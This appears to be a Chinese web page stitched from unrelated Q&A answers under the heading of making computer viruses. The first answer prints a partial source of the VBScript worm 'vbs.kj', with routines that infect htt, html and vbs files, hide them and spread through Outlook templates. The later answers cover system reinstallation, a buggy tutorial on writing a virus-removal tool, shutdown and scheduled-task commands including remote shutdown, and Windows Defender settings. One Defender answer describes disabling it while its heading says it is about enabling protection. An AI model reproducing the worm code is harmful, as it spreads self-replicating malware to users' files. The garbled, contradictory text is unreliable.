windows之家1.怎样制作一些基本的电脑病毒
那就看看vbs.kj的源码
Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk
Sub KJ_start()
\' 初始化变量
KJSetDim()
\' 初始化环境
KJCreateMilieu()
\' 感染本地或者共享上与html所在目录
KJLikeIt()
\' 通过vbs感染Outlook邮件模板
KJCreateMail()
\' 进行病毒传播
KJPropagate()
End Sub
\' 函数:KJAppendTo(FilePath,TypeStr)
\' 功能:向指定类型的指定文件追加病毒
\' 参数:
\' FilePath 指定文件路径
\' TypeStr 指定类型
Function KJAppendTo(FilePath,TypeStr)
On Error Resume Next
\' 以只读方式打开指定文件
Set ReadTemp = FSO.OpenTextFile(FilePath,1)
\' 将文件内容读入到TmpStr变量中
TmpStr = ReadTemp.ReadAll
\' 判断文件中是否存在“KJ_start()“字符串,若存在说明已经感染,退出函数;
\' 若文件长度小于1,也退出函数。
If Instr(TmpStr,“KJ_start()“) <> 0 Or Len(TmpStr) < 1 Then
ReadTemp.Close
Exit Function
End If
\' 如果传过来的类型是“htt“
\' 在文件头加上调用页面的时候加载KJ_start()函数;
\' 在文件尾追加html版本的加密病毒体。
\' 如果是“html“
\' 在文件尾追加调用页面的时候加载KJ_start()函数和html版本的病毒体;
\' 如果是“vbs“
\' 在文件尾追加vbs版本的病毒体
If TypeStr = “htt“ Then
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,2)
FileTemp.Write “<“ & “BODY onl oad=“““ & “vbscript:“ & “KJ_start()“““ & “>“ & vbCrLf & TmpStr & vbCrLf & HtmlText
FileTemp.Close
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.attributes = 34
Else
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,8)
If TypeStr = “html“ Then
FileTemp.Write vbCrLf & “<“ & “HTML>“ & vbCrLf & “<“ & “BODY onl oad=“““ & “vbscript:“ & “KJ_start()“““ & “>“ & vbCrLf & HtmlText
ElseIf TypeStr = “vbs“ Then
FileTemp.Write vbCrLf & VbsText
End If
2.电脑病毒怎么搞
二.修复系统:开机后马上按F8,看能否进入安全模式或最后一次配置正确模式,如能则进入后会自动修复注册表,并回忆前几次出现不正常现象时进行了什么操作,并根据怀疑是某个应用软件导致问题产生,将其卸载,然后正常退出,再重启就应当能进入正常模式。如有安全软件,可在安全模式下使用360安全卫士加360杀毒或者金山毒霸等等其它安全软件进行全盘木马、病毒查杀。
三.重装系统:如果以上操作无效,则需要重装系统。电脑安装系统方法很多,以下所列可择一操作。
1.硬盘安装:开机或重启后按F11键或F8键,看有没有安装一键GHOST或类似软件,有则选择一键还原按回车确定,进入一键还原操作界面后,再选择“还原”确定即可。如果以前刚装机时进行过一键备份,则能恢复到备份时的状态。另外,如果能够进入现在的系统或开机时按F8能够进入命令行模式,可搜索WINDOWS版或DOS版的GHOST.exe程序和GHO系统文件,然后手工运行GHOST程序装载系统GHO文件也能重装系统。
2.U盘安装:如果没有一键还原,则使用系统U盘重装系统。系统U盘制作及重装系统的操作步骤为:
1).制作启动U盘:到实体店买个4-8G的U盘(可以要求老板帮忙制作成系统U盘即可省略以下步骤),上网搜索下载老毛桃或大白菜等等启动U盘制作工具,将U盘插入电脑运行此软件制作成启动U盘。
2).复制系统文件:上网到系统之家网站下载WINXP或WIN7等操作系统的GHO文件,复制到U盘或启动工具指定的U盘文件夹下。
3).设置U盘为第一启动磁盘:开机按DEL键(笔记本一般为F2或其它)进入BIOS设置界面,进入BOOT选项卡设置USB磁盘为第一启动项(注:部分电脑需要在此时插入U盘进行识别才能设置),再按F10保存退出重启。
4).U盘启动并重装系统:插入U盘启动电脑,进入U盘功能菜单之后,选择“将系统克隆安装到C区”,回车确定后按提示操作,电脑会自动运行GHOST软件自动搜索U盘上的GHO文件克隆安装到C区,整个过程基本无需人工干预,直到最后进入系统桌面。
3.光盘安装:电脑使用光盘重装系统,其操作步骤如下:
1)、准备好系统光盘:如果没有可以去电脑商店购买。
2)、设置光盘启动电脑:开机后按DEL键(笔记本一般为F2或根据屏幕底行提示的热键)进入CMOS,并在BOOT选项卡中设置光驱(CD-ROM或DVD-ROM)为第一启动项,再按F10保存退出重启。
3)、插入光盘并启动电脑:重启电脑时及时将系统光盘插入光驱。
4)、克隆安装系统:光盘启动成功后会显示功能菜单,此时选择菜单中的“将系统克隆安装到C区”,回车确定后,再按提示操作即可,整个安装过程几乎完全自动化,无需人为干预。
注意:在安装系统完成后,先安装安全软件如360安全卫士加360杀毒或者金山毒霸之类其它安全软件,进行全盘查杀木马、病毒,再打好系统补丁、安装常用软件,并下载安装使用一键还原工具进行系统备份,以备不时之需。
3.电脑的系统杀毒软件怎么制作啊?
至少会两种以上编程语音,一定要学C语言,三大操作系统内核主要都是C编写的,想要了解系统内核必须学C,只有弄明白系统内核机制才能与系统很好的结合。
病毒库必须强大,其他资料你看一下我转的吧 程序模块:1、基于特征值的扫描引擎2、对内存、文件、注册表的监控模块3、自我保护模块4、未知病毒或危险行为主动防御系统5、升级等服务模块6、用户界面 过程:立项/需求分析/功能设计/概要设计/详细设计/编码/测试 如今病毒木马蠕虫层出不穷,变种也是一个接一个。反病毒公司以及各大安全公司随着影响很大的病毒的出现都会免费提供病毒专杀工具,这个举措对普通用户来说确实很有帮助。
其实写病毒专杀工具也不像大家想象的那么神秘,利用SDK写个控制台程序来实现病毒专杀,因无须写图形界面,所以简便快捷!你自己也能写!不信?就接着看吧 废话不说了,接下来就开始谈谈病毒专杀工具的思路及实现方法。 此文中讲解的病毒专杀工具是针对木马、蠕虫等独立的程序而言的广义的病毒而言,而不是指那种自我复制感染PE文件的依附于其他程序的那种狭义的病毒。
因为写那种病毒的专杀工具需要PE文件结构等知识,相对而言有点难度,所以我们就先从相对简单点的开始,难的以后再介绍。 对于大多数病毒而言,杀毒的思路其实很简单,那就是:终止病毒的进程、删除自启动项目(一般在注册表中的run*主键下)、删除病毒文件,对设置了文件关联的病毒而言还要修改注册表恢复文件关联。
下面将分别陈述。 一.终止进程 以前网上曾有许多朋友问我怎么根据文件名终止指定进程,为什么使用函数TerminateProcess()不能直接终止指定进程。
首先让我们来看看函数TerminateProcess()的声明吧:Bool TerminateProcess(HANDLE hPeocess,UINT uExitCode),其中第一个参数为进程句柄,而不是进程名称(文件名)。那怎样才能获得指定进程的句柄呢?我们可以使用函数OpenProcess(),其原型为 HANDLE OpenProcess( DWORD dwDesiredAccess, // 访问标志 BOOL bInheritHandle, // 处理继承的标志 DWORD dwProcessId // 进程标识号,即进程ID ); 最后一个参数就是该进程的ID,进程句柄和进程ID是两回事,这时你可能很郁闷:怎么知道进程ID呢?方法当然有啦!在Windows9X/2000/XP/2003中,微软均提供了用来枚举进程的ToolHelp API系列函数。
先运用函数()取得快照句柄,然后使用Process32First()以及Process32Next()枚举当前的进程。枚举过程中会将每一个进程的信息存放到PROCESSENTRY32结构中。
PROCESSENTRY32的原型为: typedef struct tagPROCESSENTRY32 { DWORD dwSize; // 结构大小; DWORD cntUsage; // 此进程的引用计数; DWORD th32ProcessID; // 进程ID; DWORD th32DefaultHeapID; // 进程默认堆ID; DWORD th32ModuleID; // 进程模块ID; DWORD cntThreads; // 此进程开启的线程计数; DWORD th32ParentProcessID; // 父进程ID; LONG pcPriClassBase; // 线程优先权; DWORD dwFlags; // 保留; char szExeFile[MAX_PATH]; // 进程全名; } PROCESSENTRY32; 其中th32ProcessID就是进程的ID,szExeFile为该进程的文件名。所以要终止指定进程,我们可以枚举进程,逐一判断szExeFile是否和我们欲终止的进程名相同,如果相同就取其th32ProcessID参数,然后代入OpenProcess函数,取得目标进程的句柄。
这样就可以利用函数TerminateProcess()终止该进程了。我写了个终止指定进程的函数,如下: void KillProcessFromName(LPCTSTR name)//name为你要终止的进程的名称,Win9X则需包括路径 { PROCESSENTRY32 pe;//定义一个PROCESSENTRY32结类型的变量 HANDLE hShot=(TH32CS_SNAPPROCESS,0);// 创建快照句柄 pe.dwSize=sizeof(PROCESSENTRY32);//一定要先为dwSize赋值 if (Process32First(hShot,&pe)) { do {if (strcmp(pe.szExeFile,name)==0) //判断此进程是否为你要终止的进程 HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,pe.th32ProcessID);//如果是就利用其ID获得句柄 TerminateProcess(hProcess,0);//终止该进程 } while(Process32Next(hkz,&pe)); } CloseHandle(hShot);//最后别忘记Close } 在使用时只要在main()主函数里调用函数KillProcessFromName(),把参数设为你要终止的进程的名称即可,Win9X则需包括路径。
还有一点值得注意一下,就是别忘了#include
三、修改注册表,删除启动项及文件关联 首先用函数RegOpenKeyEx()打开目标主键,RegOpenKeyEx()函数原型为 LONG RegOpenKeyEx( HKEY hKey,// 将要打开的键的句柄 LPCTSTR lpSubKey,// 指向将要打开的包含子建的名称字符串指针 DWORD ulOptions,// 为保留字,必须为NULL 。
4.教我制作一个可以让电脑自己重启N次的病毒
修改下面的参数或许对你有帮助! dos cmd重启2003命令shutdown -r -t 0用cmd命令来关闭或重启电脑。
at 2:00 /every:Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday shutdown /r /t 0 每天早上2点自动重新启动服务器命令。 shutdown -r -t 0 可以把上述语句用记事本写入,另存为reboot.cmd就可以了,扩展名是cmd别忘 内容来自零度科技用cmd命令来关闭或重启电脑。
内容来自零度科技at 2:00 /every:Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday shutdown /r /t 0 每天早上2点自动重新启动服务器命令。 零度科技shutdown -r -t 0 内容来自零度科技可以把上述语句用记事本写入,另存为reboot.cmd就可以了,扩展名是cmd别忘了。
r意思是从新启动 t是时间 单位是秒 0就是0秒了,立即从新启动的 把r换成s的话就是关机了,这样自己就可以设置自动关机时间 看要设置多少秒就行 设置了一定时间自动关机或者从新启动的话想取消只需要运行 shutdown -a 就可以了 copyright 先说下系统自带的关机指令,很多人应该已经知道了,就是shutdown,不带参数执行将会列出它的参数,常用参数为:/s 关闭计算机/r 关闭并重启动计算机/f 强制正在运行的应用程序关闭而不事先警告用户/t xxx 设置关闭前的超时为 xxx 秒。有效范围是 0-600,默认为 30另外,在倒计时过程输入shutdown /a可以取消关机或重启,不加/t参数执行则倒计时30秒。
copyright 一般需要立即关机可以这样写:(将/s参数换成/r参数就是立即重启)shutdown /f /s /t 0 内容来自shutdown支持对远程计算机进行操作,需要使用/m参数,如:shutdown /f /s /m \\\\test在30秒后强制将局域网中名为test的计算机关闭 copyright 再说下at指令,它的作用是计划在指定时间和日期在计算机上运行命令和程序。在命令行下输入at /?将列出它的帮助信息,在“帮助和支持中心”里有更详细的解释及示例。
零度科技提供技术支持假设想实现晚上23:30自动关机,可以这么写:at 23:30 shutdown /f /s /t 0成功的话会有类似这样的信息回应:新加了一项作业,其作业 ID = 1 内容来自要取消这个定时关机的话,有两种方法 内容来自零度科技方法一、命令行不带任何参数执行at,将会列出已经设定的内容,记下状态ID号,比如本例为1,然后输入:at 1 /delete也可以简写为:at 1 /d不加序列号使用/d参数将会删除所有设定的内容,如果想不经确认删除所有设定的内容,可用:at /d /y copyright 方法二、任务计划用at指令设定的定时执行指令可在“控制面板”的“任务计划”中看到,要取消的话删除就行了。 零度科技提供技术支持如果你只是临时用用,比如只是当天需要定时自动关机,用上述指令就行了。
如果需要在一个月中的某几天或每周一甚至是每天执行,就需要再加点参数,仍然举例说明。 内容来自例1、每月的1、5、10、15、20号的0点自动关机at 00:00 /every:1,5,10,15,20 shutdown /f /s /t 0 零度科技例2:每周一的23:00自动关机at 23:00 /every:Monday shutdown /f /s /t 0 内容来自零度科技例3:每天22:00自动关机at 22:00 /every:Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday shutdown /f /s /t 0 零度科技提供技术支持即使用every参数,例3中的每天自动关机可以简写为:at 22:00 /every:Su,M,T,W,Th,F,Sa shutdown /f /s /t 0 内容来自最后解释一下该命令适用XP/2003,Windows 2000是不自带shutdown指令的(当然从XP/2003系统里复制一个过去也能用),我的机器上也没装Windows 2000,不知道在2000里是否自带at指令。
内容来自另,用at指令而不是在任务计划里添加是因为用at指令添加的任务是以系统最高的SYSTEM权限来执行的,不登录也会生效,而在任务计划里添加的任务需要指定管理员帐号密码才能做到不登录也生效,at指令还能用\\\\computername指定在局域网里的其它计算机上建立自动执行的任务计划,当然前提条件是你有对方机器的管理员帐号和密码。 零度科技补充二点:1、用以上命令,并命令执行时,系统进入关机倒计时。
这时,如果正在工作,不需要关机,那马上在倒计时设置时间内运行“shutdown.exe -a”中止关机命令。也可以建立一个这个命令的快捷方式在桌面上,方便使用。
2、拷贝Shutdown.exe到2000系统下AT命令完全可以使用,包括Win2000、Win2000Server。 零度科技提供技术支持用at配合shutdown命令非常方便。
比如要在晚上22:00关机,可以使用at 22:00 shutdown -s -f 内容来自零度科技附ShutDown用法及参数用法: shutdown [-i | -l | -s | -r | -a] [-f] [-m \computername] [-t xx] [-c "comment"] [-d up:xx:yy]没有参数 显示此消息(与 ? 相同)-i 显示 GUI 界面,必须是第一个选项-l 注销(不能与选项 -m 一起使用)-s 关闭此计算机-r 关闭并重启动此计算机-a 放弃系统关机-m \computername 远程计算机关机/重启动/放弃-t xx 设置关闭的超时为 xx 秒-c "comment" 关闭注释(最大 127 个字符)-f 强制运行的应用程序关闭而没有警告-d [p]:xx:yy 关。
5.win10系统里Windows Defender怎么设置
1. 手动调用Defender的方法
Windows Defender藏在Windows 10的后台,安全的时候它一般不会出来,只有当发现问题,它才会自动跳出来提醒处理。但若要手动全盘扫描,需要临时调出这个软件,还要到系统“纵深”方向去摸索寻找。
Windows Defender藏得比较深。按照常规办法,点击“开始”菜单的“所有程序”,然后再定位到“Windows系统”分支,在下面才能找到它的影子。此外,在系统设置的“更新和安全”分组窗口中,选择Windows Defender项并将右侧列表移动到最底部,也才能看到打开Windows Defender的文字链接。
小提示:
默认情况下,系统升级程序会自动更新Windows Defender的病毒库。如果电脑设置为未受保护状态,病毒库未进行更新,就不能实现最新保护。这时,可点击“更新→更新定义”按钮,对病毒和间谍软件定义进行手动更新。
2. 建立快捷查杀的启动方式
Windows Defender藏得较深,调用不方便,我们可以为其建立快捷方式,以方便调用。将Windows Defender快捷方式添加到桌面或任务栏,调用起来就方便多了。
搜索系统分区“C:Program FilesWindows Defender”文件夹,找到MSASCui.exe文件并右击,选择“发送到→桌面快捷方式”,可在桌面上建立启动Windows Defender的快捷方式。为便于识别,可将快捷方式更名为Windows Defender。
Windows Defender启动后其图标会显示在任务栏托盘,但关闭之后该图标随即会消失。为此,可通过修改注册表让其常驻任务栏。启动注册表编辑器并定位到“HKEY_CURRENT_”,在右侧窗格右击新建“字符串值”并重命名为“Windows Defender”,双击设置其数值数据为“"%ProgramFiles%Windows DefenderMSASCui.exe"-runkey”(注意是半角引号)。重启资源管理器之后,安全软件图标就会出现在任务栏上了。
小提示:
在最新版的Windows 10中,Windows Defender自动在系统资源管理器中添加了右键查杀的项目,这样针对具体的文件夹查杀,就又多了一个快捷入口,不用为了查杀一个文件启动通盘查杀了。
3. 离线应急启动Defender
如果Windows系统因病毒造成无法启动,也就失去了靠其自身的功能查杀的能力。此时,可用提前制作好的离线版Defender进行查杀。离线版的制作需要先通过微软网站下载Windows Defender离线版工具,运行并创建启动闪存盘或光盘。用此移动介质启动电脑后,查杀电脑中存在的恶意软件,抢救出有用的数据。
小提示:
从Windows 10 RedStone预览版14271起,Windows Defender新增内置版“离线杀毒”功能,用户不需要手动制作闪存盘或光盘启动介质,也可以直接进入安全环境来查杀病毒。
4. Defender服务无法启动?
第三方的杀毒软件接管了系统安全之后,Windows自带的Windows Defender软件服务会随之关闭。之后,如果想要开启Windows Defender服务,可能会遇到服务无法启动的问题。
遇到这种情况,可执行GPEDIT.MSC启动组策略,依次定位到“计算机配置→管理模板→Windows组件→Windows Defender”,在右侧窗格找到“关闭Windows defender”;双击该项并在弹出的对话框中点击“已启用”,确定即可。需要注意的是,有些杀毒软件与Windows Defender的冲突是无解的,哪怕使用本文的方案也无法开启。
6.win10的组策略怎么开启自带的病毒防护
1. 右击桌面左下角的“Windows”按钮,从弹出的右键菜单中选择“运行”项,以打开“运行”窗口;
2. 从打开的“运行”窗口中,输入命令“gpedit.msc”并点击“确定”按钮,将打开“组策略编辑器”界面;
3. 从打开的“组策略编辑”界面,依次展开“计算机配置”→“管理模板”→“Windows 组件”,从中就可以找到“Windows Defender”项;
4. 展开“Windows Defender”项,从右侧找到“关闭Windows Defender”项,鼠标右击从其右键菜单中选择“编辑”项;
5. 从打开的“关闭Windows Defender”窗口中,勾选“已启用”项,点击“确定”按钮;
6. 接下来点击任务栏右下角的“显示隐藏的图标”按钮,并从打开的任务栏图标列表中找到“Windows Defender”图标点击打开;
7. 由于之前已经通过设置组策略将此程序关闭,因此将弹出“此应用已被组策略关闭”的提示窗口,在此直接点击“关闭”按钮即可彻底关闭“Windows Defender”程序;
8. 当然,Win10缺少了Windows Defender的安全防护功能后,系统受病毒攻击的可能性大大提升,对此需要安装相关安全防护类程序,以确保Win10正式版系统的安全。
具体步骤:
1. 按“win+r”唤出运行,输入“gpedit.msc”。
2. 在组策略编辑器中,依次展开“计算机配置→管理模板→Windows组件→Windows Defender”,在右侧找到并打开“关闭 Windows Defender”。
3. 在弹出的窗口中,选择“已禁用”。然后点击应用和确定。
4. 右键点击开始菜单,在弹出的菜单中选择“控制面板”。
5. 在控制面板中,以大图标进行查看,找到并打开“Windows Defender”。
6. 接下来点击立即启动“Windows Defender”即可。
参考资料
win10系统开启病毒防护的方法.搜狐科技[引用时间2017-12-28]
转载请注明出处windows之家 » win10电脑病毒制作